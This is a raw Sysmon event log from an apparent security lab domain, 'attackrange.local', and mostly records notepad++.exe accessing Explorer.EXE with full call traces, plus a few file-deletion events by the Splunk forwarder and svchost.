10341000x80000000000000001047010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.869{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.868{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.868{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.868{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.868{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001047004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001047003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8 10341000x80000000000000001047002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001047001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001047000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001046999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001046998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.832{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001046997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.768{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+1746d2|C:\Windows\System32\windows.storage.dll+174ba6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814 10341000x80000000000000001046996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.748{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1747e9|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001046995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.748{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+174765|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001046994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.748{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f 10341000x80000000000000001046993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.748{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e 23542300x80000000000000001046992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.018{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E0848F2CA901CC15DAA0714D412093A,SHA256=7586283B71723A0C4C1BCC02842F092D3E8300DA5DB95332473AC22E10C89B00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:30.065{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=427D86622804FA503B75EAE58869AE01,SHA256=55B486C5F7AF1C3BC8157F37CFB32C72A6A4B19AB9C4362D7EF0A1EC71A49B1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:31.706{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A419902A4AB2FE646D1A9CC702A7F61,SHA256=51056FF7F9142238D1E8A8B1EAB534FC9E154F8C13065566F32F4B84C4B0F633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:31.347{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 